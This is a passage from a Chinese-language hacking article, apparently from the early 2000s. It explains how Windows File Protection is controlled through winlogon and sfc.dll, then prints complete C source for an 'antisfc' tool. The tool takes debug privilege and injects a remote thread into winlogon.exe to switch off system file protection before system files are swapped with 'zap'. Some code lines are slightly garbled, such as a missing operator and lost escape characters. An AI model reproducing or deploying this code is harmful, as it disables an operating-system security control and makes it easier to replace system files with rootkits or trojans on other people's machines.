这时我想它的工作原理大概是winlogon调用sfc.dll中的输出函数在系统启动时创建了一系列事件. 既然winlogon创建了, 那么它也应该得撤销. 用depends打开winlogon. 果然从sfc.dll中输入了两个函数. 一个是刚才分析的那个, 创建了一系列事件. 看看另一个, 输出地址是76926869, 不出所料, 关闭了一系列事件. 现在我们只要向winlogon中注入代码调用"另一个"函数就能取消文件保护功能了. 不过winlogon不能随便注入代码. 26A杂志第六期上有篇文章提到了注入方法:"adjust debugger access rightz to our process". 那也是一篇SFCDisable的文章, 他用的方法是在内存中搜索特征码, 然后修改. 通用性应该没这么好.
下面的注入方法是从crazylord的代码中拷过来的, 不过方法不是. :), 写完后就懒得检查了, 加之水平有限, 写的不过优雅的地方就将就着看.
-----------------cut antisfc.c-----------
#include <stdlib.h>
#include "Windows.h"
#include "Tlhelp32.h"
#pragma comment( lib, "Advapi32.lib" )
typedef void (_stdcall * CLOSEEVENTS)(void);
typedef unsigned long DWORD;
typedef DWORD ANTISFC_ACCESS;
/*
* ANTISFC structures
*/
typedef struct _ANTISFC_PROCESS {
DWORD Pid; // process pid
HANDLE ProcessHandle; // process handle
char ImageName[MAX_PATH]; // image name (not full path)
} ANTISFC_PROCESS, *PANTISFC_PROCESS;
__inline void ErrorMessageBox(char *szAdditionInfo)
{
printf("error on %s, error code %d. n", szAdditionInfo, GetLastError());
}
void usage(char *n) {
printf("usage: %s [/d]n", n);
printf("t/d: disable sfc file protecte fuction.n");
exit(0);
}
DWORD Init() {
DWORD Ret = 0;
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
ErrorMessageBox("OpenProcessToken");
} else {
if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue)) {
ErrorMessageBox("LookupPrivilegeValue");
} else {
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof tkp, NULL, NULL)) {
ErrorMessageBox("AdjustTokenPrivileges");
} else {
Ret = 1;
}
}
CloseHandle(hToken);
}
return(Ret);
}
DWORD GetPidEx(char *proc_name, char *full_path) {
DWORD dwPid=0;
HANDLE hSnapshot;
PROCESSENTRY32 pe;
BOOL Ret;
if (isdigit(proc_name[0]))
dwPid = strtoul(proc_name, NULL, 0);
else
dwPid = -1;
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == (HANDLE) -1){
ErrorMessageBox("CreateToolhelp32Snapshot");
return(0);
}
pe.dwSize = sizeof(PROCESSENTRY32);
Ret = Process32First(hSnapshot, &pe);
while (Ret) {
if((strncmp(strlwr(pe.szExeFile), strlwr(proc_name), strlen(proc_name)) == 0)
(pe.th32ProcessID == dwPid)) {
dwPid = pe.th32ProcessID;
strcpy(full_path, pe.szExeFile);
break;
}
pe.dwSize = sizeof(PROCESSENTRY32);
Ret = Process32Next(hSnapshot, &pe);
}
CloseHandle(hSnapshot);
if (dwPid == -1)
dwPid = 0;
return(dwPid);
}
DWORD InitProcess(PANTISFC_PROCESS Process, char *proc_name, ANTISFC_ACCESS access) {
DWORD Ret=0;
Process->Pid = GetPidEx(proc_name, Process->ImageName);
if (Process->Pid != 0 && Process->ImageName[0] != 0) {
Process->ProcessHandle = OpenProcess(access, FALSE, Process->Pid);
if (Process->ProcessHandle == NULL)
ErrorMessageBox("OpenProcess");
else
Ret = 1;
}
return(Ret);
}
DWORD InjectThread(PANTISFC_PROCESS Process,
PVOID function) {
HANDLE hThread;
DWORD dwThreadPid = 0, dwState;
hThread = CreateRemoteThread(Process->ProcessHandle,
NULL,
0,
(DWORD (__stdcall *) (void *)) function,
NULL,
0,
&dwThreadPid);
if (hThread == NULL) {
ErrorMessageBox("CreateRemoteThread");
goto cleanup;
}
dwState = WaitForSingleObject(hThread, 4000); // attends 4 secondes
switch (dwState) {
case WAIT_TIMEOUT:
case WAIT_FAILED:
ErrorMessageBox("WaitForSingleObject");
goto cleanup;
case WAIT_OBJECT_0:
break;
default:
ErrorMessageBox("WaitForSingleObject");
goto cleanup;
}
CloseHandle(hThread);
return dwThreadPid;
cleanup:
CloseHandle(hThread);
return 0;
}
int main(int argc, char* argv[])
{
ANTISFC_PROCESS Process;
HMODULE hSfc;
DWORD dwThread;
CLOSEEVENTS pfnCloseEvents;
DWORD dwVersion;
printf("AntiSfc programed by bgate. :) *nn");
if (argc != 2)
usage(argv[0]);
if (strcmp(argv[1], "/d") != 0) {
usage(argv[0]);
}
if (Init()) {
printf("debug privilege setn");
} else {
printf("error on get debug privilegen");
return(0);
}
if(InitProcess(&Process, "winlogon.exe", PROCESS_ALL_ACCESS) == 0) {
printf("error on get process info. n");
return(0);
}
dwVersion = GetVersion();
if ((DWORD)(LOBYTE(LOWORD(dwVersion))) == 5){ // Windows 2000/XP
if((DWORD)(HIBYTE(LOWORD(dwVersion))) == 0){ //Windows 2000
hSfc = LoadLibrary("sfc.dll");
printf("Win2000n");
}
else {//if((DWORD)(HIBYTE(LOWORD(dwVersion))) = 1) //Windows XP
hSfc = LoadLibrary("sfc_os.dll");
printf("Windows XPn");
}
}
//else if () //2003?
else {
printf("unsupported versionn");
}
pfnCloseEvents = (CLOSEEVENTS)GetProcAddress(hSfc,
MAKEINTRESOURCE(2));
if(pfnCloseEvents == NULL){
printf("Load the sfc fuction failedn");
FreeLibrary(hSfc);
return(0);
}
FreeLibrary(hSfc);
dwThread = InjectThread(&Process,
pfnCloseEvents);
if(dwThread == 0){
printf("failedn");
}
else{
printf("OKn");
}
CloseHandle(Process.ProcessHandle);
return(0);
}
------------------end cut---------
在运行zap替换系统文件前运行一下antisfc就行了, 你也可以把它们写到一起. 理论上他能在2000, xp, 2003?的任何版本上使用. 不过我只在Win2K sp4+, WinXP sp1+上测试过.
本文的缺点是替换的系统文件只能在重启后生效, 写完了.
参考文献:
http://www.chapeaux-noirs.org/win/
